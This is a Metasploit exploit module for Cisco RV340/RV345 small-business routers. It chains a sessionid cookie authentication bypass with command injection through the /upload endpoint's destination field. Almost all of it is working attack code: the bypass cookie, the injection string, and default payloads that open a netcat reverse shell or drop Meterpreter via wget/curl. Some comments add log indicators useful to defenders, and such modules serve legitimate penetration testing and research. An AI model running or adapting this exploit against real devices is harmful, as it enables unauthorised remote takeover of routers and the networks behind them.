##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for Cisco RV340/RV345 routers (firmware 1.0.03.24 and below,
# per the Description): a sessionid-cookie authentication bypass followed by a
# command injection through the /upload endpoint. Every request this module
# sends is an artifact a defender can look for in the device's web server logs
# (the Notes entry below declares IOC_IN_LOGS and ARTIFACTS_ON_DISK).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  # Module metadata (name, targets, references, defaults) and options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
        'Description' => %q{
          This module exploits a sessionid directory traversal authentication bypass, a sessionid
          improper input validation authentication bypass, and command injection on Cisco RV340 and
          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
          at Sea Security.
          This module works on firmware versions 1.0.03.24 and below
        },
        'License' => MSF_LICENSE,
        'Platform' => ['Linux', 'Unix'],
        'Author' => [
          'Biem Pham', # Vulnerability Discoveries
          'Neterum', # Metasploit Module
          'jbaines-r7' # This metasploit module is heavily inspired from
          # cisco_rv_series_authbypass_and_rce.rb
        ],
        'DisclosureDate' => '2021-11-02',
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'References' => [
          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
          [ 'CVE', '2022-20701'],
          [ 'CVE', '2022-20705'],
          [ 'CVE', '2022-20707']
        ],
        'Targets' => [
          # Target 0: the encoded payload is injected as-is in a single request
          # (see exploit and execute_command).
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          # Target 1: the binary payload is fetched and run via the CmdStager
          # (wget/curl), which calls execute_command once per staged command.
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Payload' => {
                # The injection point sits inside a single-quoted shell argument
                # (see `destination` in send_exploit), so a literal quote in the
                # staged command would break out of it prematurely.
                'BadChars' => '\''
              },
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    # NOTE(review): TARGETURI is registered here but never read; both request
    # URIs in send_exploit are hard-coded ('/jsonrpc' and '/upload'), so
    # changing this option has no effect.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path', '/'])
      ]
    )
  end

  # Vulnerability check.
  #
  # This is not a passive probe: it runs the full send_exploit request chain
  # with the command `id`, so a check leaves the same login and upload requests
  # in the target's logs as a real exploitation attempt.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no response arrives, Safe on
  #   a non-200 status or an unexpected body, Appears when the body contains a
  #   JSON-RPC 2.0 marker or a "301 Moved Permanently" title
  def check
    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
    # Test to see if router is responding and possibly vulnerable
    res = send_exploit('id')
    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200

    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
    end

    CheckCode::Safe('The target did not respond with an expected payload.')
  end

  # Sends a single command through the injection point.
  #
  # For every target other than :unix_cmd the HTTP reply is validated (200
  # status and a JSON body) and the module aborts otherwise. For the :unix_cmd
  # target nothing about the reply is inspected, so the "successfully executed"
  # line below is printed regardless of what, if anything, came back.
  #
  # @param cmd [String] shell command to inject
  # @param _opts [Hash] unused here; accepted so execute_cmdstager can pass its
  #   options when it calls this method
  # @return [void]
  def execute_command(cmd, _opts = {})
    res = send_exploit(cmd)
    if target['Type'] != :unix_cmd
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    end
    print_good('Exploit successfully executed.')
  end

  # Performs the two-request exploitation sequence and returns the response to
  # the second request.
  #
  # 1. POST /jsonrpc with a fixed JSON-RPC "login" call (user and pass both
  #    "bienpnn"). Its response is discarded.
  # 2. POST /upload as multipart/form-data. The Cookie header carries two
  #    sessionid values (note the space before the first `=`): a
  #    directory-traversal string and a fixed all-'a' token. The `destination`
  #    form field closes a single-quoted shell argument, appends `cmd`, and
  #    comments out the remainder of the line with `#`.
  #
  # Detection: a repeated "sessionid" cookie containing "../" sequences and a
  # multipart `destination` field beginning with "'; " are useful log
  # indicators for this traffic.
  #
  # @param cmd [String] shell command to inject
  # @return [Object, nil] the response object from the /upload request, or nil
  #   when nothing came back within the 10-second timeout given as the second
  #   argument to send_request_cgi
  def send_exploit(cmd)
    send_request_cgi({
      'encode_params' => false,
      'method' => 'POST',
      'uri' => '/jsonrpc',
      'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
    })

    filepath = '/tmp/upload.input'
    filename = 'bienpnn'
    pathparam = 'Configuration'
    fileparam = 'bienpnn'
    # Closes the quoted argument, injects cmd, and comments out the tail.
    destination = '\'; ' + cmd + " #"
    input = 'bienpnn'

    # Part order is preserved in the encoded body.
    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="bienpnn"')

    send_request_cgi({
      'method' => 'POST',
      'uri' => '/upload',
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'headers' => {
        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
      },
      'data' => multipart_form.to_s
    }, 10)
  end

  # Entry point: dispatches on the selected target's Type.
  #
  # :unix_cmd injects the encoded payload directly; :linux_dropper hands off to
  # the CmdStager, which drives execute_command. Any other Type is a no-op.
  #
  # @return [void]
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 120)
    end
  end
end